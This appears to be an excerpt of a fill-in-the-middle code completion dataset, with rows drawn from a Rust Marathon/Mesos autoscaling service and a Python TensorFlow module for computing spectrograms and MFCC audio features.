file_name (large_string, lengths 4–140) | prefix (large_string, lengths 0–12.1k) | suffix (large_string, lengths 0–12k) | middle (large_string, lengths 0–7.51k) | fim_type (large_string, 4 classes) |
---|---|---|---|---|
service.rs | _cpu_usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct | {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => {
max_instances = from_value(v.clone()).unwrap();
}
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
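// Illustrative numbers for the cpu_usage formula above (hypothetical sample values):
// with a previous Statistic of timestamp 100.0 and cpu_time 2.0, and a new sample at
// timestamp 130.0 whose summed cpu_time is 11.0, sampling_duration = 30 s and
// cpu_time_usage = 9 s, so cpu_usage = 9.0 / 30.0 * 100.0 = 30 %.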
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
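// Illustrative scaling step (hypothetical app state): with multiplier = 1.5 an app
// running 4 instances is scaled to (4.0 * 1.5).ceil() = 6, and the PUT body sent to
// Marathon becomes {"instances": 6}; if 6 exceeded max_instances the method would
// only log and return early.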
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response | Service | identifier_name |
service.rs | _usage: f64,
pub max_instances: i64,
pub instances: i64,
pub tasks: HashMap<String, String>,
}
#[derive(Debug)]
pub struct Statistic {
pub timestamp: f64,
pub cpu_time: f64,
pub cpu_usage: f64,
pub mem_usage: f64,
}
#[derive(Debug, Deserialize)]
struct TaskStatistic {
cpus_limit: f64,
cpus_system_time_secs: f64,
cpus_user_time_secs: f64,
mem_limit_bytes: i64,
mem_rss_bytes: i64,
timestamp: f64,
}
pub struct Service {
handle: Handle,
marathon_url: String,
mesos_url: String,
max_mem_usage: f64,
max_cpu_usage: f64,
multiplier: f64,
max_instances: i64,
}
impl Service {
pub fn new(handle: Handle, marathon_url: String, mesos_url: String,
max_mem_usage: f64, max_cpu_usage: f64,
multiplier: f64, max_instances: i64)
-> Service {
Service {
handle: handle,
marathon_url: marathon_url,
mesos_url: mesos_url,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
multiplier: multiplier,
max_instances: max_instances,
}
}
pub fn get_apps(&mut self) -> Fut<Vec<String>> {
let url = format!("{}/v2/apps", &self.marathon_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["apps"].as_array().unwrap();
let mut apps = Vec::new();
for x in data.iter() {
let id = x["id"].as_str().unwrap();
apps.push(id[1..].to_string());
}
apps
}).boxed()
}
pub fn get_app(&mut self, app: &str) -> Fut<Option<App>> {
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app);
let app = app.to_string();
let mut max_instances = self.max_instances.clone();
let mut max_mem_usage = self.max_mem_usage.clone();
let mut max_cpu_usage = self.max_cpu_usage.clone();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let instances = data.pointer("/app/instances").unwrap();
let instances = instances.as_i64().unwrap();
let labels = data.pointer("/app/labels").unwrap();
let labels = labels.as_object().unwrap();
for (label, value) in labels {
match (label.as_ref(), value) {
("AUTOSCALE_MAX_INSTANCES", v) => |
("AUTOSCALE_MEM_PERCENT", v) => {
max_mem_usage = from_value(v.clone()).unwrap();
}
("AUTOSCALE_CPU_PERCENT", v) => {
max_cpu_usage = from_value(v.clone()).unwrap();
}
_ => {}
}
}
let xs = data.pointer("/app/tasks").unwrap();
let xs = xs.as_array().unwrap();
let mut tasks = HashMap::new();
for x in xs.iter() {
let id = x["id"].as_str().unwrap();
let slave_id = x["slaveId"].as_str().unwrap();
tasks.insert(id.clone().to_string(),
slave_id.clone().to_string());
}
Some(App {
name: app,
max_instances: max_instances,
max_mem_usage: max_mem_usage,
max_cpu_usage: max_cpu_usage,
instances: instances,
tasks: tasks,
})
}).boxed()
}
pub fn get_slaves(&mut self) -> Fut<HashMap<String, String>> {
let url = format!("{}/master/slaves", &self.mesos_url);
self.send_get(&url).map(|body| {
let data = from_str::<Value>(&body).unwrap();
let data = data["slaves"].as_array().unwrap();
let mut slaves = HashMap::new();
for slave in data.iter() {
let id = slave["id"].as_str().unwrap();
let hostname = slave["hostname"].as_str().unwrap();
let port = slave["port"].as_i64().unwrap();
let addr = format!("{}:{}", hostname, port);
slaves.insert(id.clone().to_string(), addr.to_string());
}
slaves
}).boxed()
}
pub fn get_statistic(&mut self, app: &App,
slaves: &HashMap<String, String>,
prev: Option<&Statistic>)
-> Fut<Statistic> {
let mut futs = Vec::new();
for (id, slave_id) in &app.tasks {
let url = slaves.get::<String>(&slave_id).unwrap().to_string();
futs.push(self.get_task_statistic(url, id));
}
let mut prev_timestamp = 0.0;
let mut prev_cpu_time = 0.0;
if let Some(p) = prev {
prev_timestamp = p.timestamp;
prev_cpu_time = p.cpu_time;
}
futures::collect(futs).map(move |tasks| {
let mut mems: Vec<f64> = Vec::new();
let mut cpus: Vec<f64> = Vec::new();
let mut timestamp: f64 = 0.0;
for task in tasks {
if task.is_none() {
continue;
}
let task = task.unwrap();
timestamp = task.timestamp;
cpus.push(task.cpus_user_time_secs + task.cpus_system_time_secs);
mems.push(100.0 * task.mem_rss_bytes as f64 /
task.mem_limit_bytes as f64);
}
let mem_usage = mems.iter()
.fold(0.0, |a, &b| a + b) / mems.len() as f64;
let cpu_time = cpus.iter()
.fold(0.0, |a, &b| a + b) / cpus.len() as f64;
let sampling_duration = timestamp - prev_timestamp;
let cpu_time_usage = cpu_time - prev_cpu_time;
let cpu_usage = cpu_time_usage / sampling_duration * 100.0;
Statistic {
timestamp: timestamp,
cpu_time: cpu_time,
mem_usage: mem_usage,
cpu_usage: cpu_usage,
}
}).boxed()
}
pub fn scale(&mut self, app: &App) -> Fut<()> {
let instances = (app.instances as f64 * self.multiplier).ceil() as i64;
if instances > app.max_instances {
info!("Cannot scale {}, reached maximum instances of: {}",
app.name, app.max_instances);
return futures::done(Ok(())).boxed();
}
let url = format!("{}/v2/apps/{}", &self.marathon_url, &app.name);
let body = format!(r#"{{"instances": {}}}"#, instances);
let session = Session::new(self.handle.clone());
let mut req = Easy::new();
req.url(&url).unwrap();
req.put(true).unwrap();
let mut list = List::new();
list.append("Content-Type: application/json").unwrap();
req.http_headers(list).unwrap();
req.post_field_size(body.as_bytes().len() as u64).unwrap();
req.read_function(move |buf| {
let mut data = body.as_bytes();
Ok(data.read(buf).unwrap_or(0))
}).unwrap();
session.perform(req).map(|mut r| {
info!("Scaling response code: {}", r.response_code().unwrap());
}).boxed()
}
fn get_task_statistic(&mut self, slave: String, id: &str)
-> Fut<Option<TaskStatistic>> {
let url = format!("http://{}/monitor/statistics", &slave);
let id = id.to_string();
self.send_get(&url).map(move |body| {
let data = from_str::<Value>(&body).unwrap();
let data = data.as_array().unwrap();
data.iter().find(|x| {
x["executor_id"].as_str().unwrap() == id
}).map(|x| {
from_value(x["statistics"].clone()).unwrap()
})
}).boxed()
}
fn send_get(&mut self, url: &str) -> Fut<String> {
let session = Session::new(self.handle.clone());
let response = Arc::new(Mutex::new(Vec::new()));
let headers = Arc::new(Mutex::new(Vec::new()));
let mut req = Easy::new();
req.get(true).unwrap();
req.url(url).unwrap();
let response2 = response.clone();
req.write_function(move |data| {
response2.lock().unwrap().extend_from_slice(data);
Ok(data.len())
}).unwrap();
let headers2 = headers.clone();
req.header_function(move |header| {
headers2.lock().unwrap().push(header.to_vec());
true
}).unwrap();
session.perform(req).map(move |_| {
let response = response.lock().unwrap();
let response = String::from_utf8_lossy(&response);
response | {
max_instances = from_value(v.clone()).unwrap();
} | conditional_block |
audio_processing.py | OTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
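# Illustrative shape check for the call above (assumes 1 s of 16 kHz audio):
#   stft = get_stft(tf.zeros([16000]), frame_length=512, frame_step=256)
# with pad_end=True this should give ceil(16000 / 256) = 63 frames, and the default
# fft size (the enclosing power of two, 512) gives 512 // 2 + 1 = 257 frequency bins,
# i.e. stft.shape == (63, 257) with dtype complex64.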
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot( | tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
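# Worked example for delta() with N=1 (hypothetical 3-frame, 1-feature input):
# denominator = 2 * 1**2 = 2 and each row is a central difference over the
# zero-padded sequence, so
#   delta(tf.constant([[1.0], [2.0], [4.0]]), 1)
# evaluates to [[1.0], [1.5], [-1.0]] (the first and last rows use the zero padding).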
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
)
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
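# Illustrative feature width for get_mfcc (hypothetical argument choices):
#   mfcc = get_mfcc(log_mel, num_mel_bins_to_pick=12, add_energy=True,
#                   add_first_delta=True, add_second_delta=True)
# keeps 12 cepstral coefficients plus energy (13 columns), then appends the first and
# second deltas of those 13 columns, giving (12 + 1) * 3 = 39 features per frame.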
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
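# Illustrative call (hypothetical file path):
#   waveform = load_audio('data/yes/example.wav', sample_rate=16000, clip_duration=1)
# decode_wav pads or truncates to sample_rate * clip_duration samples, so
# waveform.shape == (16000,) regardless of the clip's actual length.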
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
),
| random_line_split |
|
audio_processing.py | OTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
# mel_spectrogram.set_shape(
# spectrogram.shape[:-1].concatenate(linear_to_mel_weight_matrix.shape[-1:]))
# print('mel spectrogram shape after: ', mel_spectrogram.shape)
if log:
# Compute a stabilized log to get log-magnitude mel-scale spectrograms.
mel_spectrogram = tf.math.log(mel_spectrogram + 1e-6)
if add_energy:
# Compute power spectrum of each frame
audio_power = tf.math.square(spectrogram)
# Compute total energy of each frame and collect them to a column vector
energy = tf.reshape(tf.reduce_sum(audio_power, 1), [audio_power.shape[0], 1])
mel_spectrogram = tf.concat([mel_spectrogram, energy], 1)
return mel_spectrogram
# http://practicalcryptography.com/miscellaneous/machine-learning/guide-mel-frequency-cepstral-coefficients-mfccs/#deltas-and-delta-deltas
# https://github.com/jameslyons/python_speech_features/blob/master/python_speech_features/base.py
# edited to work with tf.tensors
def delta(feat, N):
"""Compute delta features from a feature vector sequence.
:param feat: A tensor of shape (NUMFRAMES, features) containing features. Each row holds 1 feature vector.
:param N: For each frame, calculate delta features based on preceding and following N frames
:returns: A tensor of shape (NUMFRAMES, features) containing delta features. Each row holds 1 delta feature vector.
"""
if N < 1:
raise ValueError('N must be an integer >= 1')
NUMFRAMES = feat.shape[0]
denominator = 2 * sum([i**2 for i in range(1, N + 1)])
delta_feat = tf.reshape((), (0, feat.shape[1]))
padded = tf.pad(
feat, tf.constant([[N, N], [0, 0]]), 'CONSTANT', 0
) # padded version of feat
for t in range(NUMFRAMES):
delta_feat = tf.concat([
delta_feat,
tf.reshape(
tf.tensordot(
tf.range(-N, N + 1, 1, tf.float32), padded[t:t + 2 * N + 1], 1
) / denominator, (1, feat.shape[1])
)
], 0) # [t : t+2*N+1] == [(N+t)-N : (N+t)+N+1]
return delta_feat
def get_mfcc(
log_mel_spectrogram,
num_mel_bins_to_pick=12,
add_energy=False,
add_first_delta=False,
add_second_delta=False,
symmetric_zero_padding=0,
):
# If add_energy, assume that the last bin in log mel spectrograms represents energy and separate it
if (add_energy):
|
# https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# Compute MFCCs from log mel spectrograms
# Take num_mel_bins_to_pick bins
mfcc = tf.signal.mfccs_from_log_mel_spectrograms(log_mel_spectrogram)[
..., :num_mel_bins_to_pick]
# add symmetric_zero_padding vectors of zeroes to both ends of the time dimension
if symmetric_zero_padding > 0:
zero_pad = tf.zeros([symmetric_zero_padding, num_mel_bins_to_pick])
mfcc = tf.concat([zero_pad, mfcc, zero_pad], 0)
# Add energy back if it was separated
if add_energy:
mfcc = tf.concat([mfcc, energy], 1)
if add_first_delta:
mfcc_delta = delta(mfcc, 1)
mfcc = tf.concat([mfcc, mfcc_delta], 1)
if add_second_delta:
mfcc_double_delta = delta(mfcc_delta, 1)
mfcc = tf.concat([mfcc, mfcc_double_delta], 1)
return mfcc
def load_audio(audio_file_path, sample_rate, clip_duration):
audio_binary = tf.io.read_file(audio_file_path)
# works only with 16bit wav files
# audio file is assumed to have sample rate equal to sample_rate
# scales to [-1.0, 1.0]
# takes clip_duration seconds of audio
# adds zero padding if clip is too short
tensor, _ = tf.audio.decode_wav(
audio_binary,
desired_channels=1,
desired_samples=int(sample_rate * clip_duration)
)
# remove last dimension, in this case the number of channels
return tf.squeeze(tensor, axis=-1)
def prepare_waveform_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = tf.data.Dataset.from_tensor_slices(file_paths)
waveform_ds = waveform_ds.map(
lambda file_path: load_audio(file_path, sample_rate, clip_duration),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_channels:
waveform_ds = waveform_ds.map(
lambda tensor: tf.expand_dims(tensor, -1),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
if add_labels:
return add_labels_to_dataset(waveform_ds, file_paths, labels_to_integers)
return waveform_ds
def prepare_mel_spectrogram_dataset(
file_paths,
sample_rate=16000,
clip_duration=1,
fft_frame_length=512,
fft_frame_step=256,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False,
add_labels=True,
labels_to_integers=[],
add_channels=False
):
waveform_ds = prepare_waveform_dataset(file_paths, sample_rate, clip_duration, False)
# apply short time fourier transform to each waveform
stft_ds = waveform_ds.map(
lambda waveform:
get_stft(waveform, frame_length=fft_frame_length, frame_step=fft_frame_step),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
# get mel spectrograms
mel_spectrogram_ds = stft_ds.map(
lambda stft: get_mel_spectrogram(
stft, sample_rate, num_mel_bins, lower_edge_hertz, upper_edge_hertz, log,
add_energy
| energy = tf.slice(
log_mel_spectrogram, [0, log_mel_spectrogram.shape[1] - 1],
[log_mel_spectrogram.shape[0], 1]
)
log_mel_spectrogram = tf.slice(
log_mel_spectrogram, [0, 0],
[log_mel_spectrogram.shape[0], log_mel_spectrogram.shape[1] - 1]
) | conditional_block |
audio_processing.py | (file_path):
# each file's label is its directory's name
parts = tf.strings.split(file_path, os.path.sep)
return parts[-2]
def prepare_label_dataset(file_paths):
# create dataset by splitting input tensor to individual items
label_ds = tf.data.Dataset.from_tensor_slices(file_paths)
# extract labels from filepaths
# AUTOTUNE automatically optimizes data prefetching
return label_ds.map(get_label, num_parallel_calls=tf.data.experimental.AUTOTUNE)
def add_labels_to_dataset(dataset, file_paths, label_list=[]):
label_ds = prepare_label_dataset(file_paths)
if len(label_list) > 0:
label_ds = label_ds.map(
lambda label: tf.argmax(label == label_list),
num_parallel_calls=tf.data.experimental.AUTOTUNE
)
return tf.data.Dataset.zip((dataset, label_ds))
def get_stft(waveform, frame_length=512, frame_step=256):
# apply short-time Fourier transform
# splits signal into frames and applies Fourier transform on those
# by default uses smallest power of 2 enclosing frame_length for fft size
# uses hann window, an alternative would be hamming window
# https://www.tensorflow.org/api_docs/python/tf/signal/stft
return tf.signal.stft(
waveform,
frame_length=frame_length,
frame_step=frame_step,
window_fn=tf.signal.hann_window,
pad_end=True
)
def get_mel_spectrogram(
stft,
sample_rate,
num_mel_bins=40,
lower_edge_hertz=20.0,
upper_edge_hertz=4000.0,
log=False,
add_energy=False
):
# spectrograms need only magnitude from stft
# https://www.tensorflow.org/tutorials/audio/simple_audio#spectrogram
spectrogram = tf.abs(stft)
# the number of bins in the source spectrogram
# understood to be fft_size // 2 + 1
# // == floordiv
# https://www.tensorflow.org/api_docs/python/tf/signal/linear_to_mel_weight_matrix#args
num_spectrogram_bins = spectrogram.shape[-1]
# calculate a weight matrix that can be used to re-weight a spectrogram to mel-scale
linear_to_mel_weight_matrix = tf.signal.linear_to_mel_weight_matrix(
num_mel_bins, num_spectrogram_bins, sample_rate, lower_edge_hertz,
upper_edge_hertz
)
# convert spectrogram to mel-scale
mel_spectrogram = tf.tensordot(spectrogram, linear_to_mel_weight_matrix, 1)
# print('mel spectrogram shape before: ', mel_spectrogram.shape)
# print('mel spectrogram shape before: ', mel_spectrogram.shape[:-1])
# # https://www.tensorflow.org/api_docs/python/tf/signal/mfccs_from_log_mel_spectrograms#for_example
# # why is this needed?
